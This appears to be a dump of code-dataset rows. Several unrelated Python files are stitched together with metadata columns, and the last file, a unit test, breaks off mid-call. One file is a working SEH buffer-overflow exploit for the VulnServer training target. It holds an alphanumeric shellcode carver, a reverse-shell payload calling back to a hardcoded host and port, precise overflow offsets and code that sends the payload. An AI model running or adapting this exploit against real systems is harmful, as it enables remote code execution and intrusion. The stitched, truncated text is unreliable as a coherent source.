| 27.583333 | 79 | 0.718602 | 292 | 2,317 | 5.59589 | 0.267123 | 0.127295 | 0.186047 | 0.25459 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00939 | 0.172637 | 2,317 | 83 | 80 | 27.915663 | 0.842984 | 0.02978 | 0 | 0 | 0 | 0 | 0.117647 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.258065 | false | 0.064516 | 0.145161 | 0.241935 | 0.709677 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 6 |
8030fec0dcd3f5486d86356268545e2c1dcec1d8 | 132 | py | Python | dnplab/math/__init__.py | DNPLab/dnpLab | 79dc347a239b4e41dc2c41342744414405b9ab33 | [
"MIT"
] | null | null | null | dnplab/math/__init__.py | DNPLab/dnpLab | 79dc347a239b4e41dc2c41342744414405b9ab33 | [
"MIT"
] | 1 | 2020-09-03T22:07:15.000Z | 2020-09-03T22:07:15.000Z | dnplab/math/__init__.py | DNPLab/dnpLab | 79dc347a239b4e41dc2c41342744414405b9ab33 | [
"MIT"
] | null | null | null | """Modules to construct numpy arrays from input arguments"""
from . import lineshape
from . import window
from . import relaxation
| 26.4 | 61 | 0.780303 | 17 | 132 | 6.058824 | 0.705882 | 0.291262 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.151515 | 132 | 4 | 62 | 33 | 0.919643 | 0.416667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8048e5a8e31f5c0f97a71448e130f57106efbf9e | 233 | py | Python | Transposition/DoubleTransposition.py | AVM-Martin/CTF-EncryptionAlgorithm | 1226f3db8d3358e1f50ae2f2722f66dee281507a | [
"WTFPL"
] | null | null | null | Transposition/DoubleTransposition.py | AVM-Martin/CTF-EncryptionAlgorithm | 1226f3db8d3358e1f50ae2f2722f66dee281507a | [
"WTFPL"
] | null | null | null | Transposition/DoubleTransposition.py | AVM-Martin/CTF-EncryptionAlgorithm | 1226f3db8d3358e1f50ae2f2722f66dee281507a | [
"WTFPL"
] | null | null | null | from Transposition import Transposition
class DoubleTransposition(Transposition):
    def encrypt(self, text):
        return super().encrypt(super().encrypt(text))

    def decrypt(self, text):
        return super().decrypt(super().decrypt(text))
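The class simply applies the parent cipher twice in each direction, so it round-trips whenever the parent does. A self-contained sketch with a toy stand-in parent (the real `Transposition` class is imported above; this stub is only illustrative):

```python
# Toy stand-in for the parent cipher: a simple even/odd column transposition.
class Transposition:
    def encrypt(self, text):
        return text[::2] + text[1::2]          # even-indexed chars first

    def decrypt(self, text):
        half = (len(text) + 1) // 2
        out = [''] * len(text)
        out[::2] = text[:half]                 # re-interleave the two halves
        out[1::2] = text[half:]
        return ''.join(out)

# Same pattern as the class above: apply the parent cipher twice.
class DoubleTransposition(Transposition):
    def encrypt(self, text):
        return super().encrypt(super().encrypt(text))

    def decrypt(self, text):
        return super().decrypt(super().decrypt(text))

cipher = DoubleTransposition()
ct = cipher.encrypt('ATTACKATDAWN')
assert ct != 'ATTACKATDAWN'                    # text is actually scrambled
assert cipher.decrypt(ct) == 'ATTACKATDAWN'    # and the round trip inverts it
```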
| 23.3 | 47 | 0.759657 | 27 | 233 | 6.555556 | 0.444444 | 0.090395 | 0.158192 | 0.214689 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.107296 | 233 | 9 | 48 | 25.888889 | 0.850962 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.166667 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
805972173b0984bb2412e41a28b8ae6f3a6db802 | 36 | py | Python | pyplan/pyplan/__init__.py | jorgedouglas71/pyplan-ide | 5ad0e4a2592b5f2716ff680018f717c65de140f5 | [
"MIT"
] | 17 | 2019-12-04T19:22:19.000Z | 2021-07-28T11:17:05.000Z | pyplan/pyplan/__init__.py | jorgedouglas71/pyplan-ide | 5ad0e4a2592b5f2716ff680018f717c65de140f5 | [
"MIT"
] | 9 | 2019-12-13T15:34:43.000Z | 2022-02-10T11:43:00.000Z | pyplan/pyplan/__init__.py | jorgedouglas71/pyplan-ide | 5ad0e4a2592b5f2716ff680018f717c65de140f5 | [
"MIT"
] | 5 | 2019-12-04T15:57:06.000Z | 2021-08-20T19:59:26.000Z | from .config import PyplanAppConfig
| 18 | 35 | 0.861111 | 4 | 36 | 7.75 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 36 | 1 | 36 | 36 | 0.96875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
33a120dab1202b11315a87500ceac45606194b49 | 2,339 | py | Python | pyplusplus/function_transformers/__init__.py | electronicvisions/pyplusplus | 4d88bb8754d22654a61202ae8adc222807953e38 | [
"BSL-1.0"
] | 5 | 2021-01-29T19:54:34.000Z | 2022-03-23T11:16:37.000Z | pyplusplus/function_transformers/__init__.py | electronicvisions/pyplusplus | 4d88bb8754d22654a61202ae8adc222807953e38 | [
"BSL-1.0"
] | null | null | null | pyplusplus/function_transformers/__init__.py | electronicvisions/pyplusplus | 4d88bb8754d22654a61202ae8adc222807953e38 | [
"BSL-1.0"
] | 3 | 2016-04-06T15:16:49.000Z | 2019-01-15T07:08:29.000Z | # Helper classes for wrapper function creation
"""This sub-package implements function transformation functionality"""
from .transformer import transformer_t
from . import transformers
from .function_transformation import function_transformation_t
def output( *args, **keywd ):
    def creator( function ):
        return transformers.output_t( function, *args, **keywd )
    return creator


def input( *args, **keywd ):
    def creator( function ):
        return transformers.input_t( function, *args, **keywd )
    return creator


def inout( *args, **keywd ):
    def creator( function ):
        return transformers.inout_t( function, *args, **keywd )
    return creator


def input_static_array( *args, **keywd ):
    def creator( function ):
        return transformers.input_static_array_t( function, *args, **keywd )
    return creator


def output_static_array( *args, **keywd ):
    def creator( function ):
        return transformers.output_static_array_t( function, *args, **keywd )
    return creator


def inout_static_array( *args, **keywd ):
    def creator( function ):
        return transformers.inout_static_array_t( function, *args, **keywd )
    return creator


def input_static_matrix( *args, **keywd ):
    def creator( function ):
        return transformers.input_static_matrix_t( function, *args, **keywd )
    return creator


def output_static_matrix( *args, **keywd ):
    def creator( function ):
        return transformers.output_static_matrix_t( function, *args, **keywd )
    return creator


def inout_static_matrix( *args, **keywd ):
    def creator( function ):
        return transformers.inout_static_matrix_t( function, *args, **keywd )
    return creator


def modify_type( *args, **keywd ):
    def creator( function ):
        return transformers.type_modifier_t( function, *args, **keywd )
    return creator


def input_c_buffer( *args, **keywd ):
    def creator( function ):
        return transformers.input_c_buffer_t( function, *args, **keywd )
    return creator


def transfer_ownership( *args, **keywd ):
    def creator( function ):
        return transformers.transfer_ownership_t( function, *args, **keywd )
    return creator


def from_address( *args, **keywd ):
    def creator( function ):
        return transformers.from_address_t( function, *args, **keywd )
    return creator
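All thirteen factories differ only in which `transformers` class they instantiate, so they could be generated by one higher-order helper. A hypothetical refactoring sketch (`_make_factory` and `_dummy_t` are illustrative names, not part of the pyplusplus API):

```python
# Hypothetical helper: builds a factory like output()/input()/inout() above
# for any transformer class.
def _make_factory(transformer_cls):
    def factory(*args, **keywd):
        def creator(function):
            return transformer_cls(function, *args, **keywd)
        return creator
    return factory

# e.g. output = _make_factory(transformers.output_t)

# Demo with a stand-in transformer class:
class _dummy_t:
    def __init__(self, function, *args, **keywd):
        self.function, self.args, self.keywd = function, args, keywd

dummy = _make_factory(_dummy_t)
t = dummy(1, 2, size=3)('some_function')
assert (t.function, t.args, t.keywd) == ('some_function', (1, 2), {'size': 3})
```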
| 31.186667 | 78 | 0.693459 | 270 | 2,339 | 5.818519 | 0.133333 | 0.14895 | 0.0993 | 0.157225 | 0.80331 | 0.80331 | 0.783577 | 0.65436 | 0.451941 | 0 | 0 | 0 | 0.201796 | 2,339 | 74 | 79 | 31.608108 | 0.841457 | 0.047456 | 0 | 0.472727 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.472727 | false | 0 | 0.054545 | 0.236364 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
33a261e2d0bb38f8dd4c6aca4e0ff6e32939453a | 57 | py | Python | src/deep_dialog/usersims/__init__.py | sujoung/debuggedDDQ | 0b2751b063e28030dff6bf115ae2c4dd2cf7a0cf | [
"MIT"
] | null | null | null | src/deep_dialog/usersims/__init__.py | sujoung/debuggedDDQ | 0b2751b063e28030dff6bf115ae2c4dd2cf7a0cf | [
"MIT"
] | null | null | null | src/deep_dialog/usersims/__init__.py | sujoung/debuggedDDQ | 0b2751b063e28030dff6bf115ae2c4dd2cf7a0cf | [
"MIT"
] | null | null | null | from .usersim_rule import *
from .usersim_model import *
| 19 | 28 | 0.789474 | 8 | 57 | 5.375 | 0.625 | 0.511628 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.140351 | 57 | 2 | 29 | 28.5 | 0.877551 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
33a6c3f105057161672a4fe6d209ec91010948ab | 166 | py | Python | exoastrology/__init__.py | emilyhunt/exoplanet-astrology | ca9356c096d8456ae0cdd2f4514f144ec8f57136 | [
"BSD-3-Clause"
] | 2 | 2022-01-24T22:12:25.000Z | 2022-02-02T22:21:24.000Z | exoastrology/__init__.py | emilyhunt/exoplanet-astrology | ca9356c096d8456ae0cdd2f4514f144ec8f57136 | [
"BSD-3-Clause"
] | null | null | null | exoastrology/__init__.py | emilyhunt/exoplanet-astrology | ca9356c096d8456ae0cdd2f4514f144ec8f57136 | [
"BSD-3-Clause"
] | null | null | null | from .horoscope import generate, generate_initial_tweet
from .twitter import start_client, post_thread, post_horoscope, run_horoscopes
from .util import split_string
| 41.5 | 78 | 0.861446 | 23 | 166 | 5.913043 | 0.695652 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.096386 | 166 | 3 | 79 | 55.333333 | 0.906667 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
33deae1e501b724f49441c6f27db168d3e4d72ae | 11,000 | py | Python | VulnServer/LTER/exploit_seh.py | cwinfosec/practice | c0010258799aa5c9f9e5cccec2ba8515b8424771 | [
"MIT"
] | 1 | 2020-10-03T07:57:42.000Z | 2020-10-03T07:57:42.000Z | VulnServer/LTER/exploit_seh.py | cwinfosec/practice | c0010258799aa5c9f9e5cccec2ba8515b8424771 | [
"MIT"
] | null | null | null | VulnServer/LTER/exploit_seh.py | cwinfosec/practice | c0010258799aa5c9f9e5cccec2ba8515b8424771 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
"""
Description: AlphaNumeric Buffer Overflow (SEH) w/ shellcode carver via "LTER" in VulnServer
Author: Cody Winkler
Contact: @cwinfosec (twitter)
Date: 11/15/2019
Tested On: Windows XP SP2 EN
[+] Usage: python exploit_seh.py <IP> <PORT>
$ python exploit_seh.py 127.0.0.1 9999
"""
import socket
from struct import pack
import sys
host = sys.argv[1]
port = int(sys.argv[2])
# End of D's BEFFFF
# Beginning of A's BEF230
# A's offset: DBF (-3519 bytes)
# ESP offset from D's: 11AF (-4527 bytes)
stager = "\x54\x58" # push esp, pop eax
stager += "\x66\x05\x7f\x11" # add ax, 0x117f | 4479 bytes
stager += "\x50\x5c" # push eax, pop esp
# Long backjump shellcode carver generated with SLink
jmp2buff = ""
jmp2buff += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
jmp2buff += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
jmp2buff += "\x05\x77\x62\x41\x41" ## add eax, 0x41416277
jmp2buff += "\x05\x66\x62\x41\x41" ## add eax, 0x41416266
jmp2buff += "\x05\x55\x42\x41\x41" ## add eax, 0x41414255
jmp2buff += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
jmp2buff += "\x50" ## push eax
jmp2buff += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
jmp2buff += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
jmp2buff += "\x05\x42\x07\x45\x62" ## add eax, 0x62450742
jmp2buff += "\x05\x41\x06\x44\x61" ## add eax, 0x61440641
jmp2buff += "\x50" ## push eax
jmp2buff += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
jmp2buff += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
jmp2buff += "\x05\x32\x34\x33\x17" ## add eax, 0x17333432
jmp2buff += "\x05\x22\x24\x33\x16" ## add eax, 0x16332422
jmp2buff += "\x50\x44" ## push eax
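The AND/ADD/SUB chains above are the standard alphanumeric shellcode-carving trick: two complementary AND masks zero EAX, then add/sub chains build an arbitrary DWORD that is pushed onto the stack. As an independent check of the first group's arithmetic (my own verification, not part of the original exploit), the carved value decodes to `call ebx; nop; nop`, consistent with the msfvenom payload's `BufferRegister=ebx`:

```python
from struct import pack

# The two alphanumeric masks share no set bits, so AND-ing both zeroes EAX.
eax = 0xFFFFFFFF
eax &= 0x554E4D4A
eax &= 0x2A313235
assert eax == 0

# The add/sub chain of the first carve group (32-bit wraparound semantics):
eax = (eax + 0x41416277) & 0xFFFFFFFF
eax = (eax + 0x41416266) & 0xFFFFFFFF
eax = (eax + 0x41414255) & 0xFFFFFFFF
eax = (eax - 0x33333333) & 0xFFFFFFFF
assert eax == 0x9090D3FF

# Pushed little-endian, the bytes in memory are FF D3 90 90: call ebx; nop; nop.
assert pack('<I', eax) == b'\xff\xd3\x90\x90'
```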
# msfvenom -p windows/shell_reverse_tcp EXITFUNC=thread LHOST=10.10.10.16 LPORT=4444 -b '\x00' -e x86/alpha_mixed BufferRegister=ebx -f c
# Shellcode has to be ASCII-friendly or else it will die
shellcode = ("\x53\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
"\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
"\x50\x38\x41\x42\x75\x4a\x49\x6b\x4c\x39\x78\x4c\x42\x47\x70"
"\x33\x30\x45\x50\x71\x70\x6b\x39\x7a\x45\x66\x51\x59\x50\x53"
"\x54\x6e\x6b\x46\x30\x54\x70\x6e\x6b\x61\x42\x56\x6c\x6e\x6b"
"\x51\x42\x57\x64\x6e\x6b\x54\x32\x44\x68\x76\x6f\x48\x37\x63"
"\x7a\x77\x56\x66\x51\x39\x6f\x6c\x6c\x77\x4c\x30\x61\x31\x6c"
"\x54\x42\x76\x4c\x71\x30\x79\x51\x68\x4f\x44\x4d\x37\x71\x79"
"\x57\x59\x72\x49\x62\x53\x62\x52\x77\x6c\x4b\x70\x52\x52\x30"
"\x6e\x6b\x70\x4a\x45\x6c\x4c\x4b\x52\x6c\x32\x31\x30\x78\x4a"
"\x43\x53\x78\x75\x51\x7a\x71\x56\x31\x4e\x6b\x70\x59\x51\x30"
"\x37\x71\x78\x53\x4e\x6b\x73\x79\x32\x38\x48\x63\x34\x7a\x43"
"\x79\x6c\x4b\x65\x64\x6e\x6b\x43\x31\x7a\x76\x46\x51\x59\x6f"
"\x6c\x6c\x4b\x71\x58\x4f\x34\x4d\x75\x51\x5a\x67\x64\x78\x4d"
"\x30\x43\x45\x48\x76\x44\x43\x51\x6d\x7a\x58\x65\x6b\x61\x6d"
"\x37\x54\x33\x45\x38\x64\x62\x78\x4e\x6b\x42\x78\x74\x64\x53"
"\x31\x59\x43\x72\x46\x6c\x4b\x34\x4c\x72\x6b\x4c\x4b\x52\x78"
"\x65\x4c\x46\x61\x4a\x73\x4e\x6b\x44\x44\x4e\x6b\x53\x31\x4e"
"\x30\x6e\x69\x31\x54\x51\x34\x71\x34\x31\x4b\x73\x6b\x35\x31"
"\x32\x79\x73\x6a\x73\x61\x39\x6f\x59\x70\x63\x6f\x61\x4f\x73"
"\x6a\x6e\x6b\x67\x62\x68\x6b\x4e\x6d\x61\x4d\x70\x68\x55\x63"
"\x65\x62\x45\x50\x53\x30\x71\x78\x54\x37\x30\x73\x66\x52\x73"
"\x6f\x62\x74\x42\x48\x52\x6c\x34\x37\x37\x56\x75\x57\x6b\x4f"
"\x38\x55\x4d\x68\x6c\x50\x37\x71\x67\x70\x67\x70\x75\x79\x5a"
"\x64\x42\x74\x36\x30\x35\x38\x45\x79\x4f\x70\x70\x6b\x77\x70"
"\x39\x6f\x69\x45\x76\x30\x66\x30\x66\x30\x62\x70\x31\x50\x62"
"\x70\x47\x30\x70\x50\x75\x38\x78\x6a\x46\x6f\x6b\x6f\x79\x70"
"\x6b\x4f\x7a\x75\x4f\x67\x70\x6a\x37\x75\x62\x48\x74\x4a\x67"
"\x7a\x45\x5a\x74\x50\x72\x48\x76\x62\x65\x50\x37\x61\x43\x6c"
"\x6d\x59\x49\x76\x52\x4a\x46\x70\x32\x76\x61\x47\x43\x58\x6f"
"\x69\x39\x35\x52\x54\x35\x31\x4b\x4f\x4e\x35\x6b\x35\x4b\x70"
"\x33\x44\x36\x6c\x39\x6f\x70\x4e\x67\x78\x30\x75\x4a\x4c\x52"
"\x48\x48\x70\x78\x35\x4e\x42\x53\x66\x69\x6f\x48\x55\x55\x38"
"\x33\x53\x30\x6d\x53\x54\x73\x30\x6f\x79\x79\x73\x62\x77\x66"
"\x37\x32\x77\x56\x51\x59\x66\x33\x5a\x57\x62\x36\x39\x52\x76"
"\x69\x72\x49\x6d\x43\x56\x5a\x67\x32\x64\x66\x44\x35\x6c\x37"
"\x71\x33\x31\x4c\x4d\x71\x54\x46\x44\x66\x70\x4f\x36\x67\x70"
"\x42\x64\x30\x54\x32\x70\x30\x56\x33\x66\x53\x66\x71\x56\x43"
"\x66\x42\x6e\x50\x56\x76\x36\x73\x63\x71\x46\x42\x48\x74\x39"
"\x58\x4c\x77\x4f\x6b\x36\x39\x6f\x58\x55\x6c\x49\x6d\x30\x50"
"\x4e\x56\x36\x51\x56\x59\x6f\x74\x70\x53\x58\x63\x38\x4c\x47"
"\x57\x6d\x71\x70\x49\x6f\x4a\x75\x6f\x4b\x4d\x30\x75\x4d\x35"
"\x7a\x35\x5a\x63\x58\x6c\x66\x4a\x35\x4d\x6d\x6f\x6d\x49\x6f"
"\x4a\x75\x75\x6c\x56\x66\x61\x6c\x54\x4a\x4d\x50\x39\x6b\x79"
"\x70\x43\x45\x63\x35\x6d\x6b\x72\x67\x72\x33\x50\x72\x62\x4f"
"\x73\x5a\x35\x50\x53\x63\x49\x6f\x38\x55\x41\x41")
# Overflowed with lter.spk "LTER /.:/(EIP @ 3520 A's)"
# NSEH overwritten at 3495
# SEH overwritten at 3499
seh = pack("<I", 0x6250172B)
nseh = "\x43\x43\x75\xff"
buffer = "LTER /.:/"
buffer += "A"*12
buffer += shellcode
buffer += "A"*(3495-124-12-len(shellcode))
buffer += stager
buffer += jmp2buff
buffer += "A"*(124-len(stager)-len(jmp2buff))
buffer += nseh
buffer += seh
buffer += "D"*(1000-len(nseh)-len(seh))
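The padding arithmetic above can be sanity-checked offline before firing the exploit: the three padding terms must place nSEH at offset 3495 and the SEH pointer at 3499, counting from the end of the `LTER /.:/` command, exactly as the crash comments state. A minimal sketch, with hypothetical payload sizes standing in for the real shellcode, stager and jmp2buff:

```python
# Sanity-check the SEH layout (nSEH at 3495, SEH at 3499).
# The payload sizes below are hypothetical stand-ins only.
shellcode = b"\x90" * 300          # hypothetical shellcode size
stager = b"\x90" * 32              # hypothetical stager size
jmp2buff = b"\xeb\x80"             # hypothetical 2-byte short jump
nseh = b"\x43\x43\x75\xff"
seh = b"\x2b\x17\x50\x62"          # little-endian 0x6250172B

body = b"A" * 12
body += shellcode
body += b"A" * (3495 - 124 - 12 - len(shellcode))
body += stager
body += jmp2buff
body += b"A" * (124 - len(stager) - len(jmp2buff))
assert len(body) == 3495           # nSEH starts exactly at offset 3495
body += nseh
assert len(body) == 3499           # SEH handler address at offset 3499
body += seh
body += b"D" * (1000 - len(nseh) - len(seh))
```

The padding terms cancel out the variable-length pieces, so the offsets hold no matter how large the (hypothetical) shellcode is, as long as it fits in the 3359-byte region.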
try:
    print "[+] Connecting to target"
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.recv(1024)
    print "[+] Sent payload with length: %d" % len(buffer)
    s.send(buffer)
    s.close()
except:
    print "[-] Something went wrong :(" | 85.271318 | 238 | 0.347455 | 1,099 | 11,000 | 3.472248 | 0.214741 | 0.023585 | 0.033019 | 0.040881 | 0.099843 | 0.091981 | 0.091981 | 0.091981 | 0.091981 | 0.091981 | 0 | 0.320158 | 0.54 | 11,000 | 129 | 239 | 85.271318 | 0.433992 | 0.343727 | 0 | 0.084211 | 0 | 0.494737 | 0.471493 | 0.40737 | 0 | 0 | 0.001451 | 0 | 0 | 0 | null | null | 0 | 0.031579 | null | null | 0.031579 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
33f6e00013258d05f8dada680e6300841ae4dc5c | 112 | py | Python | ufdl-core-app/src/ufdl/core_app/serialisers/models/__init__.py | waikato-ufdl/ufdl-backend | 776fc906c61eba6c2f2e6324758e7b8a323e30d7 | [
"Apache-2.0"
] | null | null | null | ufdl-core-app/src/ufdl/core_app/serialisers/models/__init__.py | waikato-ufdl/ufdl-backend | 776fc906c61eba6c2f2e6324758e7b8a323e30d7 | [
"Apache-2.0"
] | 85 | 2020-07-24T00:04:28.000Z | 2022-02-10T10:35:15.000Z | ufdl-core-app/src/ufdl/core_app/serialisers/models/__init__.py | waikato-ufdl/ufdl-backend | 776fc906c61eba6c2f2e6324758e7b8a323e30d7 | [
"Apache-2.0"
] | null | null | null | from ._ModelSerialiser import ModelSerialiser
from ._PreTrainedModelSerialiser import PreTrainedModelSerialiser
| 37.333333 | 65 | 0.910714 | 8 | 112 | 12.5 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.071429 | 112 | 2 | 66 | 56 | 0.961538 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
1d54c02d6ae7d88b5ba16135d67a74e81576b2d8 | 111 | py | Python | tests/test_http_auth.py | rickproza/twill | 7a98e4912a8ff929a94e35d35e7a027472ee4f46 | [
"MIT"
] | 13 | 2020-04-18T15:17:58.000Z | 2022-02-24T13:25:46.000Z | tests/test_http_auth.py | rickproza/twill | 7a98e4912a8ff929a94e35d35e7a027472ee4f46 | [
"MIT"
] | 5 | 2020-04-04T21:16:00.000Z | 2022-02-10T00:26:20.000Z | tests/test_http_auth.py | rickproza/twill | 7a98e4912a8ff929a94e35d35e7a027472ee4f46 | [
"MIT"
] | 3 | 2020-06-06T17:26:19.000Z | 2022-02-10T00:30:39.000Z | from .utils import execute_script
def test(url):
    execute_script('test_http_auth.twill', initial_url=url)
| 18.5 | 59 | 0.774775 | 17 | 111 | 4.764706 | 0.705882 | 0.320988 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.126126 | 111 | 5 | 60 | 22.2 | 0.835052 | 0 | 0 | 0 | 0 | 0 | 0.18018 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
1d609d2ce29f4212fae2f904bd517be106c53d2c | 17,571 | py | Python | tests/test_extract_pbo.py | tjensen/dayz-dev-tools | e88c7f4d169778737f2299b6cb10dac9b1a29127 | [
"MIT"
] | 4 | 2021-07-26T00:27:01.000Z | 2022-03-20T16:39:42.000Z | tests/test_extract_pbo.py | tjensen/dayz-dev-tools | e88c7f4d169778737f2299b6cb10dac9b1a29127 | [
"MIT"
] | 19 | 2021-08-04T21:56:12.000Z | 2022-02-27T22:25:19.000Z | tests/test_extract_pbo.py | tjensen/dayz-dev-tools | e88c7f4d169778737f2299b6cb10dac9b1a29127 | [
"MIT"
] | 2 | 2021-09-17T01:11:44.000Z | 2022-01-28T16:43:01.000Z | import os
import typing
import unittest
from unittest import mock
from dayz_dev_tools import extract_pbo
from dayz_dev_tools import pbo_file
class TestExtractPbo(unittest.TestCase):
    def setUp(self) -> None:
        super().setUp()
        self.mock_pboreader = mock.Mock()
        self.mock_pboreader.prefix.return_value = None
        makedirs_patcher = mock.patch("os.makedirs")
        self.mock_makedirs = makedirs_patcher.start()
        self.addCleanup(makedirs_patcher.stop)
        bin_to_cpp_patcher = mock.patch("dayz_dev_tools.config_cpp.bin_to_cpp")
        self.mock_bin_to_cpp = bin_to_cpp_patcher.start()
        self.addCleanup(bin_to_cpp_patcher.stop)
    def create_mock_file(self, filename: bytes, contents: bytes) -> pbo_file.PBOFile:
        def unpack(dest: typing.BinaryIO) -> None:
            dest.write(contents)
        mock_file = pbo_file.PBOFile(filename, b"", 0, 0, 0, 0)
        mock.patch.object(mock_file, "unpack", side_effect=unpack).start()
        return mock_file
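The helper above patches `unpack` on each fake file so that unpacking writes canned bytes into the destination stream. The same `mock.patch.object(..., side_effect=...)` pattern in isolation (a standalone sketch; `Dummy` is a hypothetical stand-in for `PBOFile`):

```python
import io
from unittest import mock

class Dummy:
    def unpack(self, dest):
        raise NotImplementedError  # real body is never reached once patched

obj = Dummy()
# Extra kwargs to patch.object are forwarded to the replacement MagicMock,
# so side_effect controls what happens when the patched method is called.
patcher = mock.patch.object(obj, "unpack", side_effect=lambda dest: dest.write(b"1111"))
patcher.start()

buf = io.BytesIO()
obj.unpack(buf)                     # side_effect writes into buf
assert buf.getvalue() == b"1111"
patcher.stop()
```

Calling `.start()` without a matching cleanup leaks the patch, which is why the tests register `addCleanup` for the longer-lived patchers in `setUp`.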
    def test_extracts_all_files_in_the_pbo(self) -> None:
        mock_open = mock.mock_open()
        self.mock_pboreader.files.return_value = [
            self.create_mock_file(b"dir1\\dir2\\filename.ext", b"1111"),
            self.create_mock_file(b"dir1\\filename.ext", b"2222"),
            self.create_mock_file(b"dir1\\dir2\\dir3\\filename.ext", b"3333"),
            self.create_mock_file(b"filename.ext", b"4444"),
            self.create_mock_file(b"other-filename.png", b"5555")
        ]
        with mock.patch("builtins.print") as mock_print, mock.patch("builtins.open", mock_open):
            extract_pbo.extract_pbo(
